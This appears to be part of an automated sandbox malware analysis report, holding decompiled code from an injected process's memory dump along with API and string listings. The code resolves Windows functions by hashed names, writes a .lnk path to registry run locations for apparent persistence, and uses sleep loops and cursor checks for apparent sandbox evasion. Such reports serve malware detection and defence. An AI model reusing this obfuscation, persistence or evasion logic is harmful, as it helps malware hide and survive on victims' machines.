				 *0x77b2a4 = E00771994(_v12, 0xc54374f3);
				 *0x77b2a0 = E00771994(_v12, 0x9c700049);
				 *0x77b29c = E00771994(_v12, 0x4f6ca717);
				 *0x77b2d8 = E00771994(_v12, 0x67ecde97);
				 *0x77b2dc = E00771994(_v12, 0xfdc94385);
				 *0x77b2e0 = E00771994(_v12, 0x68807354);
				 *0x77b2e4 = E00771994(_v12, 0x84d25ea);
				 *0x77b2e8 = E00771994(_v12, 0xfc7a6efd);
				 *0x77b2ec = E00771994(_v12, 0x5550b067);
				 *0x77b2f0 = E00771994(_v12, 0xaebea6a);
				 *0x77b12c = E00771994(_v12, 0x46318ac7);
				 *0x77b130 = E00771994(_v12, 0x49a1374a);
				 *0x77b134 = E00771994(_v12, 0xae17c571);
				 *0x77b150 = E00771994(_v12, 0xe61874b3);
				 *0x77b154 = E00771994(_v12, 0x3a7a7478);
				 *0x77b158 = E00771994(_v12, 0x533d3b41);
				 *0x77b15c = E00771994(_v12, 0x99a4299d);
				 *0x77b164 = E00771994(_v12, 0xbea0bf35);
				 *0x77b168 = E00771994(_v12, 0x9d00a761);
				 *0x77b188 = E00771994(_v12, 0x9abfb8a6);
				 *0x77b194 = E00771994(_v12, 0x6b416786);
				 *0x77b198 = E00771994(_v12, 0x774393e8);
				 *0x77b19c = E00771994(_v12, 0x2ee4f10d);
				 *0x77b1a0 = E00771994(_v12, 0x19f78c90);
				 *0x77b1a4 = E00771994(_v12, 0xd89ad05);
				 *0x77b1a8 = E00771994(_v12, 0xc930ea1e);
				 *0x77b18c = E00771994(_v12, 0x5bc1d14f);
				 *0x77b1e0 = E00771994(_v12, 0x77cd9567);
				 *0x77b1f0 = E00771994(_v12, 0x32432444);
				 *0x77b1f4 = E00771994(_v12, 0x279dead7);
				 *0x77b1f8 = E00771994(_v12, 0x7b4842c1);
				 *0x77b1fc = E00771994(_v12, 0xae52c609);
				 *0x77b200 = E00771994(_v12, 0xbf78969c);
				 *0x77b204 = E00771994(_v12, 0xbb74a4a2);
				 *0x77b22c = E00771994(_v12, 0x464871f3);
				 *0x77b190 = E00771994(_v12, 0x9bd6888f);
				 *0x77b20c = E00771994(_v12, 0x5c17ec75);
				 *0x77b210 = E00771994(_v12, 0x58fe7abe);
				 *0x77b254 = E00771994(_v12, 0x768aa260);
				 *0x77b25c = E00771994(_v12, 0xef0a25b7);
				 *0x77b260 = E00771994(_v12, 0xbc262395);
				 *0x77b264 = E00771994(_v12, 0xe8bf6dad);
				 *0x77b268 = E00771994(_v12, 0x5cd9430);
				 *0x77b26c = E00771994(_v12, 0xaef7cbf1);
				 *0x77b274 = E00771994(_v12, 0x475587b7);
				 *0x77b278 = E00771994(_v12, 0x3def91ba);
				 *0x77b408 = E00771994(_v12, 0xda81bc58);
				 *0x77b40c = E00771994(_v12, 0xf3b84f05);
				 *0x77b410 = E00771994(_v12, 0x392b6027);
				 *0x77b414 = E00771994(_v12, 0x7b2d2505);
				 *0x77b314 = E00771994(_v12, 0xeeba5eba);
				 *0x77b2a8 = E00771994(_v12, 0x89b968d2);
				 *0x77b2c0 = E00771994(_v12, 0x7e92ca65);
				 *0x77b2f4 = E00771994(_v12, 0x4c1077d6);
				 *0x77b31c = E00771994(_v12, 0x84033deb);
				 *0x77b320 = E00771994(_v12, 0x725cb0a1);
				 *0x77b250 = E00771994(_v12, 0x52ac19c);
				 *0x77b318 = E00771994(_v12, 0x23ebe98b);
				 *0x77b464 = E00771994(_v12, 0x3b3ee0f9);
				 *0x77b468 = E00771994(_v12, 0x8d5a50dc);
				 *0x77b46c = E00771994(_v12, 0x8d5a50ca);
				 *0x77b470 = E00771994(_v12, 0x5e7ee0d0);
				 *0x77b474 = E00771994(_v12, 0x69260152);
				 *0x77b478 = E00771994(_v12, 0x9c480e24);
				 *0x77b47c = E00771994(_v12, 0x5aa7e70b);
				 *0x77b488 = E00771994(_v12, 0xe74f57ee);
				 *0x77b48c = E00771994(_v12, 0x2d40b8f0);
				 *0x77b490 = E00771994(_v12, 0xae17c071);
				 *0x77b494 = E00771994(_v12, 0x515be757);
				 *0x77b49c = E00771994(_v12, 0x1297812c);
				 *0x77b4a0 = E00771994(_v12, 0x2f2feeda);
				 *0x77b4a4 = E00771994(_v12, 0x81f0f0df);
				 *0x77b4a8 = E00771994(_v12, 0xf3fd1c3);
				 *0x77b4ac = E00771994(_v12, 0xef48e03a);
				 *0x77b4b0 = E00771994(_v12, 0xfb0730c);
				 *0x77b4b4 = E00771994(_v12, 0xa9de6f5a);
				 *0x77b4b8 = E00771994(_v12, 0x723eb0d5);
				 *0x77b4bc = E00771994(_v12, 0x487fe16b);
				 *0x77b4c0 = E00771994(_v12, 0x8f8f114);
				 *0x77b4c4 = E00771994(_v12, 0x3d9972f5);
				 *0x77b4c8 = E00771994(_v12, 0x6fb89af0);
				 *0x77b4cc = E00771994(_v12, 0xc09d5d66);
				 *0x77b4d0 = E00771994(_v12, 0x2ca2b7e6);
				 *0x77b4d4 = E00771994(_v12, 0x7b88bf3b);
				 *0x77b4d8 = E00771994(_v12, 0xaa1de02f);
				 *0x77b4dc = E00771994(_v12, 0xa48d6762);
				 *0x77b4e0 = E00771994(_v12, 0x3a35705f);
				 *0x77b4e8 = E00771994(_v12, 0x697a6afe);
				 *0x77b4ec = E00771994(_v12, 0x95902b19);
				 *0x77b4f0 = E00771994(_v12, 0x1295012c);
				 *0x77b4f4 = E00771994(_v12, 0x2891ae7a);
				 *0x77b4f8 = E00771994(_v12, 0x831a3927);
				 *0x77b23c = E00771994(_v12, 0xd0498cd4);
				 *0x77c22c = E00771994(_v12, 0xd0498cc2);
				_t492 =  *0x77a084; // 0x771bf0
				_v12 = LoadLibraryA(_t492);
				 *0x77b230 = E00771994(_v12, 0xa638ce5f);
				 *0x77b234 = E00771994(_v12, 0xbc44a131);
				 *0x77b238 = E00771994(_v12, 0xf6edf382);
				_t500 =  *0x77a080; // 0x771be8
				_v12 = LoadLibraryA(_t500);
				 *0x77b2fc = E00771994(_v12, 0x1ab922bf);
				 *0x77b2f8 = E00771994(_v12, 0xa8afd1f3);
				 *0x77b300 = E00771994(_v12, 0xc6ce9b8a);
				 *0x77b304 = E00771994(_v12, 0xf26817eb);
				 *0x77b308 = E00771994(_v12, 0x7506e960);
				 *0x77b30c = E00771994(_v12, 0xbf7efb5a);
				 *0x77b310 = E00771994(_v12, 0x4baed1c8);
				 *0x77b484 = E00771994(_v12, 0x7396104b);
				 *0x77b480 = E00771994(_v12, 0xb800c8a6);
				 *0x77b388 = E00771994(_v12, 0x8616ab9b);
				 *0x77b38c = E00771994(_v12, 0xb4584dda);
				 *0x77b1b4 = E00771994(_v12, 0x6c7f716f);
				 *0x77b1b0 = E00771994(_v12, 0x252b53b);
				 *0x77b2ac = E00771994(_v12, 0xd36ceaf0);
				 *0x77b2b0 = E00771994(_v12, 0xd7a87c3a);
				 *0x77b2b4 = E00771994(_v12, 0xc45d9631);
				 *0x77b2b8 = E00771994(_v12, 0x4baed1de);
				 *0x77b2bc = E00771994(_v12, 0x8ebef5b1);
				 *0x77b270 = E00771994(_v12, 0xea3af0d7);
				 *0x77b418 = E00771994(_v12, 0x484007c);
				 *0x77b41c = E00771994(_v12, 0x58a81c29);
				 *0x77b420 = E00771994(_v12, 0xcacd450);
				 *0x77b424 = E00771994(_v12, 0xabbc680d);
				 *0x77b42c = E00771994(_v12, 0x7cbd2247);
				 *0x77b428 = E00771994(_v12, 0xbdb70517);
				 *0x77b430 = E00771994(_v12, 0x1d6c998b);
				 *0x77b434 = E00771994(_v12, 0xa2f65ba2);
				 *0x77b438 = E00771994(_v12, 0xad4ffcd5);
				 *0x77b43c = E00771994(_v12, 0xc8a274ac);
				 *0x77b440 = E00771994(_v12, 0x5fda1871);
				 *0x77b444 = E00771994(_v12, 0xc0d4187d);
				_t564 = LoadLibraryA("Psapi"); // executed
				_v12 = _t564;
				 *0x77b4e4 = E00771994(_v12, 0x860331a8);
				_t567 =  *0x77a0a4; // 0x771c40
				_t568 = LoadLibraryA(_t567); // executed
				_v12 = _t568;
				 *0x77b178 = E00771994(_v12, 0xa60c5f05);
				_t571 =  *0x77a0d0; // 0x771cac
				_v12 = LoadLibraryA(_t571);
				 *0x77b3ec = E00771994(_v12, 0x5af0017c);
				 *0x77b3f0 = E00771994(_v12, 0x5e10f525);
				 *0x77b3f4 = E00771994(_v12, 0x48b87efc);
				 *0x77b3f8 = E00771994(_v12, 0xdf91a857);
				 *0x77b3fc = E00771994(_v12, 0x9e90b462);
				 *0x77b400 = E00771994(_v12, 0x4894dafc);
				 *0x77b404 = E00771994(_v12, 0x59012669);
				_t587 =  *0x77a0e0; // 0x771d08
				_v12 = LoadLibraryA(_t587);
				 *0x77b330 = E00771994(_v12, 0xb9d41c2f);
				 *0x77b1b8 = E00771994(_v12, 0xb96ca1c0);
				 *0x77b1c0 = E00771994(_v12, 0x28e9e291);
				 *0x77b1c8 = E00771994(_v12, 0x1d1f334a);
				 *0x77b1cc = E00771994(_v12, 0x5cb5ef72);
				 *0x77b2c8 = E00771994(_v12, 0xce303c3a);
				 *0x77b2c4 = E00771994(_v12, 0x3e68cfc6);
				 *0x77b2cc = E00771994(_v12, 0xd4ecc759);
				 *0x77b2d0 = E00771994(_v12, 0xd21e3d01);
				 *0x77b2d4 = E00771994(_v12, 0xad0c9f7e);
				 *0x77b4fc = E00771994(_v12, 0x8ad7de34);
				 *0x77b500 = E00771994(_v12, 0x78660dbe);
				 *0x77b504 = E00771994(_v12, 0xcebf13be);
				 *0x77b508 = E00771994(_v12, 0xd4b3d42);
				 *0x77b50c = E00771994(_v12, 0x72760bb8);
				 *0x77b448 = E00771994(_v12, 0x3c4de260);
				 *0x77b44c = E00771994(_v12, 0xf837a387);
				 *0x77b450 = E00771994(_v12, 0xc3f46335);
				 *0x77b454 = E00771994(_v12, 0xa5ffa46e);
				 *0x77b458 = E00771994(_v12, 0x453db143);
				 *0x77b45c = E00771994(_v12, 0x37a53419);
				 *0x77b460 = E00771994(_v12, 0xcebf17e6);
				 *0x77b17c = E00771994(_v12, 0xaad67ff8);
				 *0x77b180 = E00771994(_v12, 0x3ef2d3dd);
				 *0x77b184 = E00771994(_v12, 0x90a097e6);
				 *0x77b16c = E00771994(_v12, 0x7a2167dc);
				 *0x77b170 = E00771994(_v12, 0x1b3d12b9);
				 *0x77b174 = E00771994(_v12, 0x80dbbe07);
				 *0x77b1ac = E00771994(_v12, 0x398c5285);
				 *0x77b1dc = E00771994(_v12, 0x560c7c4a);
				 *0x77b1d8 = E00771994(_v12, 0xdb355534);
				 *0x77b1d4 = E00771994(_v12, 0x3e400fd6);
				 *0x77b1e4 = E00771994(_v12, 0xee6ab5d);
				 *0x77b1e8 = E00771994(_v12, 0x1802e7c8);
				 *0x77b1ec = E00771994(_v12, 0xf65a7d95);
				 *0x77b224 = E00771994(_v12, 0xb8538a52);
				 *0x77b228 = E00771994(_v12, 0xccd03c3a);
				 *0x77b328 = E00771994(_v12, 0x6d523bdd);
				 *0x77b32c = E00771994(_v12, 0xf2f9de08);
				 *0x77b324 = E00771994(_v12, 0xce30283a);
				_t669 =  *0x77a094; // 0x771c20
				_v12 = LoadLibraryA(_t669);
				 *0x77b214 = E00771994(_v12, 0x3caa9945);
				 *0x77b218 = E00771994(_v12, 0x5a56b493);
				 *0x77b258 = E00771994(_v12, 0x7dfb3ef0);
				_t677 =  *0x77a088; // 0x771bf8
				_v12 = LoadLibraryA(_t677);
				 *0x77b14c = E00771994(_v12, 0xf2276995);
				 *0x77b21c = E00771994(_v12, 0xc95d8550);
				 *0x77b220 = E00771994(_v12, 0x570bc899);
				_t685 =  *0x77a098; // 0x771c28
				_t686 = LoadLibraryA(_t685); // executed
				_v12 = _t686;
				 *0x77b27c = E00771994(_v12, 0x368435be);
				 *0x77b280 = E00771994(_v12, 0xf341d5cf);
				 *0x77b284 = E00771994(_v12, 0xedb3159d);
				_t693 =  *0x77a1b8; // 0x771eec
				_v12 = LoadLibraryA(_t693);
				 *0x77b288 = E00771994(_v12, 0x3184919f);
				 *0x77b28c = E00771994(_v12, 0x39aedd1b);
				_t699 =  *0x77a0a0; // 0x771c38
				_t700 = LoadLibraryA(_t699); // executed
				_v12 = _t700;
				 *0x77b290 = E00771994(_v12, 0x8a94f707);
				 *0x77b294 = E00771994(_v12, 0x7aa45c7a);
				 *0x77b298 = E00771994(_v12, 0x4e26c00f);
				_t707 =  *0x77a0cc; // 0x771ca4
				_v12 = LoadLibraryA(_t707);
				 *0x77b33c = E00771994(_v12, 0x233e6d0f);
				_t712 = E00771994(_v12, 0xbf821ad);
				 *0x77b340 = _t712;
				if(_v8 != 0) {
					_t713 =  *0x77a1b0; // 0x771edc
					_t714 = LoadLibraryA(_t713); // executed
					_v12 = _t714;
					 *0x77b34c = E00771994(_v12, 0xd939f838);
					 *0x77b344 = E00771994(_v12, 0x9400a044);
					 *0x77b348 = E00771994(_v12, 0xee9bf475);
					 *0x77b3a4 = E00771994(_v12, 0xe797764);
					 *0x77b3a8 = E00771994(_v12, 0xedd8fe8a);
					 *0x77b3ac = E00771994(_v12, 0xe5971f6);
					 *0x77b3b0 = E00771994(_v12, 0x5d99726a);
					 *0x77b3b4 = E00771994(_v12, 0x1f935b1d);
					 *0x77b3b8 = E00771994(_v12, 0xfc7af16a);
					 *0x77b3bc = E00771994(_v12, 0x939d7d9c);
					 *0x77b3c0 = E00771994(_v12, 0xcdde757d);
					 *0x77b3c4 = E00771994(_v12, 0xc5a7764);
					 *0x77b3c8 = E00771994(_v12, 0x9e7d3188);
					 *0x77b3cc = E00771994(_v12, 0x3c797b7a);
					 *0x77b3d0 = E00771994(_v12, 0x4dfc1f3b);
					 *0x77b3d4 = E00771994(_v12, 0x8e9bf775);
					 *0x77b3d8 = E00771994(_v12, 0x8fb8b5bd);
					 *0x77b3dc = E00771994(_v12, 0xb909d088);
					 *0x77b3e0 = E00771994(_v12, 0xf44318c6);
					 *0x77b3e4 = E00771994(_v12, 0x95e4a5d7);
					_t755 =  *0x77a1b4; // 0x771ee4
					_t756 = LoadLibraryA(_t755); // executed
					_v12 = _t756;
					 *0x77b13c = E00771994(_v12, 0xaa91290b);
					 *0x77b350 = E00771994(_v12, 0x8593dd7);
					 *0x77b354 = E00771994(_v12, 0x6ae49924);
					 *0x77b358 = E00771994(_v12, 0x7314fb0c);
					 *0x77b35c = E00771994(_v12, 0xb87dbd66);
					 *0x77b360 = E00771994(_v12, 0x2f5ce027);
					 *0x77b364 = E00771994(_v12, 0xa3a80ab6);
					 *0x77b368 = E00771994(_v12, 0xddcb15d);
					 *0x77b36c = E00771994(_v12, 0x8733d614);
					 *0x77b370 = E00771994(_v12, 0xfde87743);
					 *0x77b390 = E00771994(_v12, 0x1a212962);
					 *0x77b394 = E00771994(_v12, 0x9f13856a);
					 *0x77b398 = E00771994(_v12, 0xbe618d3e);
					 *0x77b39c = E00771994(_v12, 0x1510002f);
					 *0x77b3a0 = E00771994(_v12, 0x7edec584);
					 *0x77b380 = E00771994(_v12, 0xaa912901);
					 *0x77b374 = E00771994(_v12, 0x2ae71934);
					 *0x77b378 = E00771994(_v12, 0x1ad09c78);
					 *0x77b37c = E00771994(_v12, 0x9ef6461);
					_t712 = E00771994(_v12, 0x57fbc0dd);
					 *0x77b3e8 = _t712;
				}
				return _t712;
			}

0x0077257a
0x00772582
0x00772592
0x007725a4
0x007725b6
0x007725c8
0x007725da
0x007725ec
0x007725fe
0x00772610
0x00772622
0x00772634
0x00772646
0x00772658
0x0077266a
0x0077267c
0x0077268e
0x007726a0
0x007726b2
0x007726c4
0x007726d6
0x007726e8
0x007726fa
0x0077270c
0x0077271e
0x00772730
0x00772742
0x00772754
0x00772766
0x00772778
0x0077278a
0x0077279c
0x007727ae
0x007727c0
0x007727d2
0x007727e4
0x007727f6
0x00772808
0x0077281a
0x0077282c
0x0077283e
0x00772850
0x00772862
0x00772874
0x00772886
0x00772898
0x007728aa
0x007728bc
0x007728ce
0x007728e0
0x007728f2
0x00772904
0x00772916
0x00772928
0x0077293a
0x0077294c
0x0077295e
0x00772970
0x00772982
0x00772994
0x007729a6
0x007729b8
0x007729ca
0x007729dc
0x007729ee
0x00772a00
0x00772a12
0x00772a24
0x00772a36
0x00772a48
0x00772a5a
0x00772a6c
0x00772a7e
0x00772a90
0x00772aa2
0x00772ab4
0x00772ac6
0x00772ad8
0x00772aea
0x00772afc
0x00772b0e
0x00772b20
0x00772b32
0x00772b44
0x00772b56
0x00772b68
0x00772b7a
0x00772b8c
0x00772b9e
0x00772bb0
0x00772bc2
0x00772bd4
0x00772be6
0x00772bf8
0x00772c0a
0x00772c1c
0x00772c2e
0x00772c40
0x00772c52
0x00772c64
0x00772c76
0x00772c88
0x00772c9a
0x00772cac
0x00772cbe
0x00772cd0
0x00772ce2
0x00772cf4
0x00772d06
0x00772d18
0x00772d2a
0x00772d3c
0x00772d4e
0x00772d53
0x00772d5f
0x00772d6f
0x00772d81
0x00772d93
0x00772d98
0x00772da4
0x00772db4
0x00772dc6
0x00772dd8
0x00772dea
0x00772dfc
0x00772e0e
0x00772e20
0x00772e32
0x00772e44
0x00772e56
0x00772e68
0x00772e7a
0x00772e8c
0x00772e9e
0x00772eb0
0x00772ec2
0x00772ed4
0x00772ee6
0x00772ef8
0x00772f0a
0x00772f1c
0x00772f2e
0x00772f40
0x00772f52
0x00772f64
0x00772f76
0x00772f88
0x00772f9a
0x00772fac
0x00772fbe
0x00772fd0
0x00772fda
0x00772fe0
0x00772ff0
0x00772ff5
0x00772ffb
0x00773001
0x00773011
0x00773016
0x00773022
0x00773032
0x00773044
0x00773056
0x00773068
0x0077307a
0x0077308c
0x0077309e
0x007730a3
0x007730af
0x007730bf
0x007730d1
0x007730e3
0x007730f5
0x00773107
0x00773119
0x0077312b
0x0077313d
0x0077314f
0x00773161
0x00773173
0x00773185
0x00773197
0x007731a9
0x007731bb
0x007731cd
0x007731df
0x007731f1
0x00773203
0x00773215
0x00773227
0x00773239
0x0077324b
0x0077325d
0x0077326f
0x00773281
0x00773293
0x007732a5
0x007732b7
0x007732c9
0x007732db
0x007732ed
0x007732ff
0x00773311
0x00773323
0x00773335
0x00773347
0x00773359
0x0077336b
0x0077337d
0x00773382
0x0077338e
0x0077339e
0x007733b0
0x007733c2
0x007733c7
0x007733d3
0x007733e3
0x007733f5
0x00773407
0x0077340c
0x00773412
0x00773418
0x00773428
0x0077343a
0x0077344c
0x00773451
0x0077345d
0x0077346d
0x0077347f
0x00773484
0x0077348a
0x00773490
0x007734a0
0x007734b2
0x007734c4
0x007734c9
0x007734d5
0x007734e5
0x007734f2
0x007734f7
0x00773500
0x00773506
0x0077350c
0x00773512
0x00773522
0x00773534
0x00773546
0x00773558
0x0077356a
0x0077357c
0x0077358e
0x007735a0
0x007735b2
0x007735c4
0x007735d6
0x007735e8
0x007735fa
0x0077360c
0x0077361e
0x00773630
0x00773642
0x00773654
0x00773666
0x00773678
0x0077367d
0x00773683
0x00773689
0x00773699
0x007736ab
0x007736bd
0x007736cf
0x007736e1
0x007736f3
0x00773705
0x00773717
0x00773729
0x0077373b
0x0077374d
0x0077375f
0x00773771
0x00773783
0x00773795
0x007737a7
0x007737b9
0x007737cb
0x007737dd
0x007737ea
0x007737ef
0x007737ef
0x00773858

APIs

LoadLibraryA.KERNEL32(00771BF0), ref: 00772D59
LoadLibraryA.KERNEL32(00771BE8), ref: 00772D9E
LoadLibraryA.KERNELBASE(Psapi), ref: 00772FDA
LoadLibraryA.KERNELBASE(00771C40), ref: 00772FFB
LoadLibraryA.KERNEL32(00771CAC), ref: 0077301C
LoadLibraryA.KERNEL32(00771D08), ref: 007730A9
LoadLibraryA.KERNEL32(00771C20), ref: 00773388
LoadLibraryA.KERNEL32(00771BF8), ref: 007733CD
LoadLibraryA.KERNELBASE(00771C28), ref: 00773412
LoadLibraryA.KERNEL32(00771EEC), ref: 00773457
LoadLibraryA.KERNELBASE(00771C38), ref: 0077348A
LoadLibraryA.KERNEL32(00771CA4), ref: 007734CF
LoadLibraryA.KERNELBASE(00771EDC), ref: 0077350C
LoadLibraryA.KERNELBASE(00771EE4), ref: 00773683

Strings

xtz:, xrefs: 007727B3
A;=S, xrefs: 007727C5
'`+9, xrefs: 00772A17
D$C2, xrefs: 007728AF
z{y<, xrefs: 007735FF
'\/, xrefs: 007736E6
`M<, xrefs: 007731C0
+WJ, xrefs: 00772627
Psapi, xrefs: 00772FD5
WO, xrefs: 00772B49
:H, xrefs: 00772BD9
j, xrefs: 00772759
W[Q, xrefs: 00772B7F
_p5:, xrefs: 00772CC3
ad, xrefs: 007737D0
B=K, xrefs: 0077319C

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00778D0C, Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 230
threadsleep

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E00778D0C(void* __ecx, void* __edx, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _v28;
				struct tagPOINT _v36;
				struct _SECURITY_ATTRIBUTES _v52;
				char _v309;
				void* _t58;
				intOrPtr _t59;
				void* _t60;
				void* _t61;
				signed int _t62;
				void* _t65;
				signed char _t66;
				CHAR* _t72;
				void* _t74;
				intOrPtr _t90;
				signed int _t92;
				intOrPtr _t128;
				signed int _t133;
				signed int _t139;
				signed char _t164;
				void* _t166;
				void* _t171;
				intOrPtr _t183;
				void* _t188;
				void* _t191;

				_t191 = __eflags;
				_t166 = __ecx;
				 *0x77b114 = E0077458C(0);
				E00772574(_t54 | 0xffffffff); // executed
				 *0x77a064 = E007744F0(_t191);
				_t58 = GetCurrentProcess(); // executed
				_t59 = E007742D4(_t58); // executed
				 *0x77a068 = _t59;
				_t60 = E007744F0(_t191);
				_t192 = _t60 - 0x3c;
				if(_t60 >= 0x3c) {
					_t61 = GetCurrentProcess(); // executed
					_t62 = E007742D4(_t61); // executed
					__eflags = _t62 - 3;
					_t2 = _t62 == 3;
					__eflags = _t2;
					asm("sbb eax, eax");
					 *0x77a034 =  ~(_t62 & 0xffffff00 | _t2);
				} else {
					_t164 = E007741CC();
					asm("sbb eax, eax");
					 *0x77a034 =  ~_t164;
				}
				_t65 = GetCurrentProcess(); // executed
				_t66 = E0077453C(_t65); // executed
				asm("sbb eax, eax");
				 *0x77a058 =  ~_t66;
				E007779BC(_t192);
				_v28 = LocalAlloc(0, 0x14);
				E00774408( &_v52, _v28);
				_t72 =  *0x77a0d8; // 0x771cc8
				_t74 = CreateMutexA( &_v52, 0, _t72); // executed
				 *0x77a054 = _t74;
				LocalFree(_v28);
				_t77 = _a4;
				asm("sbb eax, eax");
				_v12 =  ~(_a4 & 0xffffff00 |  *_t77 == 0x0000002b);
				_t80 = _a4;
				asm("sbb eax, eax");
				_v16 =  ~(_a4 & 0xffffff00 |  *((char*)(_t80 + 1)) == 0x0000002b);
				_a4 = _a4 + 2;
				E00771B50(); // executed
				E00778BFC(); // executed
				E00777984(); // executed
				E007789D4(); // executed
				E00777A44(_t166); // executed
				 *0x77b408(0x77be04);
				_t90 = E007747AC(_a4, 0x77b510); // executed
				 *0x77b514 = _t90;
				_t92 = E00777304(0x77b61c); // executed
				_v24 = _t92;
				asm("sbb eax, eax");
				if( ~( ~_v24) == 0) {
					E0077744C(0x77b61c); // executed
				}
				if(_v12 != 0 || _v16 != 0) {
					E0077471C(_a4, 0x2ee0, 0);
				}
				if(_v12 != 0) {
					E00771308( &_v309, _a4);
					 *((char*)(_t188 + E007712DC( &_v309) - 0x135)) = 0;
					E0077133C( &_v309, ".lnk");
					E0077471C( &_v309, 0, 0);
					if( *0x77a034 == 0) {
						E00774A1C(0x80000001,  &_v309);
					} else {
						E00774A1C(0x80000002,  &_v309);
					}
				}
				asm("sbb eax, eax");
				if( ~( ~_v12) == 0) {
					asm("sbb eax, eax");
					if( ~( ~_v16) == 0) {
						_t183 =  *0x77b514; // 0x4e600
						E00778CF8(_a4, _t183);
					}
				}
				if(_v12 == 0 || _v24 == 0) {
					E0077744C(0x77b61c); // executed
					E00778B98(0x77b518); // executed
					E00778B6C(); // executed
					E00774BA0(0x77b719); // executed
					 *0x77b780 = E00775468();
					 *0x77b651 = E00775468();
					_v8 = E00773B80(5, 0x19, 0xd);
					E00771308(0x77b752, _v8);
					E00771440(_v8);
					__eflags =  *0x77a034;
					if( *0x77a034 == 0) {
						__eflags = 0;
						_t181 =  *0x77a260; // 0x7721a4
						E00778064(0x80000001, 0, _t181);
					} else {
						_t181 =  *0x77a260; // 0x7721a4
						E00778064(0x80000002, 0, _t181); // executed
					}
					__eflags =  *0x77b621;
					if( *0x77b621 == 0) {
						L24:
						asm("sbb eax, eax");
						__eflags =  ~( ~_v12);
						if(__eflags == 0) {
							_t133 =  *0x77b784; // 0xd4
							__eflags = _t133 &  *0x77a070;
							if((_t133 &  *0x77a070) != 0) {
								__eflags =  *0x77b621 - 0x5a;
								if( *0x77b621 > 0x5a) {
									GetCursorPos( &_v36);
								}
							}
							_t181 = 0;
							__eflags = 0;
							E0077471C(_a4, 0x2ee0, 0);
						}
						E00777474(0x77b61c, __eflags);
						goto L30;
					} else {
						_t139 =  *0x77b621; // 0x12c
						_v20 = _t139;
						__eflags = _v20;
						if(_v20 == 0) {
							goto L24;
						} else {
							goto L23;
						}
						do {
							L23:
							Sleep(0x3e8); // executed
							_v20 = _v20 - 1;
							__eflags = _v20;
						} while (_v20 != 0);
						goto L24;
					}
				} else {
					_t181 = _a4;
					E00771308(0x77b518, _a4);
					E00778B6C();
					L30:
					E007738DC(0x77be04);
					 *0x77c380 = 0;
					E007738EC(0x77be04);
					_pop(_t171);
					E00775640(0x77c384, _t171, _t181);
					_t128 =  *0x77b64d; // 0x0
					 *0x77c355 = _t128;
					E00771308(0x77c254, 0x77b625);
					E007784A4();
					_push(0);
					return RtlExitUserThread();
				}
			}

0x00778d0c
0x00778d0c
0x00778d1c
0x00778d24
0x00778d2e
0x00778d33
0x00778d39
0x00778d3e
0x00778d43
0x00778d48
0x00778d4b
0x00778d5d
0x00778d63
0x00778d68
0x00778d6b
0x00778d6b
0x00778d70
0x00778d72
0x00778d4d
0x00778d4d
0x00778d54
0x00778d56
0x00778d56
0x00778d77
0x00778d7d
0x00778d84
0x00778d86
0x00778d8b
0x00778d9a
0x00778da3
0x00778da8
0x00778db4
0x00778dba
0x00778dc3
0x00778dc9
0x00778dd4
0x00778dd6
0x00778dd9
0x00778de5
0x00778de7
0x00778dea
0x00778dee
0x00778df3
0x00778df8
0x00778dfd
0x00778e02
0x00778e0c
0x00778e1a
0x00778e1f
0x00778e29
0x00778e2e
0x00778e36
0x00778e3c
0x00778e43
0x00778e43
0x00778e4c
0x00778e5e
0x00778e5e
0x00778e67
0x00778e72
0x00778e82
0x00778e96
0x00778ea8
0x00778eb4
0x00778ed3
0x00778eb6
0x00778ec1
0x00778ec1
0x00778eb4
0x00778edd
0x00778ee3
0x00778eea
0x00778ef0
0x00778ef2
0x00778efb
0x00778efb
0x00778ef0
0x00778f04
0x00778f28
0x00778f32
0x00778f37
0x00778f41
0x00778f4b
0x00778f55
0x00778f65
0x00778f70
0x00778f78
0x00778f7d
0x00778f84
0x00778f9a
0x00778f9c
0x00778fa7
0x00778f86
0x00778f88
0x00778f93
0x00778f93
0x00778fac
0x00778fb3
0x00778fd7
0x00778fdc
0x00778fe0
0x00778fe2
0x00778fe4
0x00778fef
0x00778ff1
0x00778ff3
0x00778ffa
0x00779000
0x00779000
0x00778ffa
0x0077900b
0x0077900b
0x00779010
0x00779010
0x0077901a
0x00000000
0x00778fb5
0x00778fb5
0x00778fba
0x00778fbd
0x00778fc1
0x00000000
0x00000000
0x00000000
0x00000000
0x00778fc3
0x00778fc3
0x00778fc8
0x00778fce
0x00778fd1
0x00778fd1
0x00000000
0x00778fc3
0x00778f0c
0x00778f11
0x00778f14
0x00778f19
0x0077901f
0x00779024
0x0077902c
0x00779036
0x0077903b
0x00779041
0x00779046
0x0077904b
0x0077905a
0x00779062
0x00779067
0x00779072
0x00779072

APIs

Part of subcall function 007744F0: GetVersionExA.KERNEL32(0000009C), ref: 0077451A

GetCurrentProcess.KERNEL32 ref: 00778D33

Part of subcall function 007742D4: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 007742EC
Part of subcall function 007742D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 0077430E
Part of subcall function 007742D4: GetLastError.KERNEL32 ref: 00774322
Part of subcall function 007742D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00774358
Part of subcall function 007742D4: GetSidSubAuthorityCount.ADVAPI32(?), ref: 0077436E
Part of subcall function 007742D4: GetSidSubAuthority.ADVAPI32(?,?), ref: 00774393
Part of subcall function 007742D4: CloseHandle.KERNEL32(?), ref: 007743F3

GetCurrentProcess.KERNEL32 ref: 00778D5D
GetCurrentProcess.KERNEL32 ref: 00778D77

Part of subcall function 0077453C: GetCurrentProcess.KERNEL32 ref: 00774555
Part of subcall function 0077453C: IsWow64Process.KERNELBASE(00000000,?), ref: 0077456F

Part of subcall function 007779BC: RtlInitializeCriticalSection.NTDLL(0077BE04), ref: 00777A14
Part of subcall function 007779BC: RtlInitializeCriticalSection.NTDLL(0077C234), ref: 00777A2E

LocalAlloc.KERNEL32(00000000,00000014), ref: 00778D94

Part of subcall function 00774408: InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 0077441F
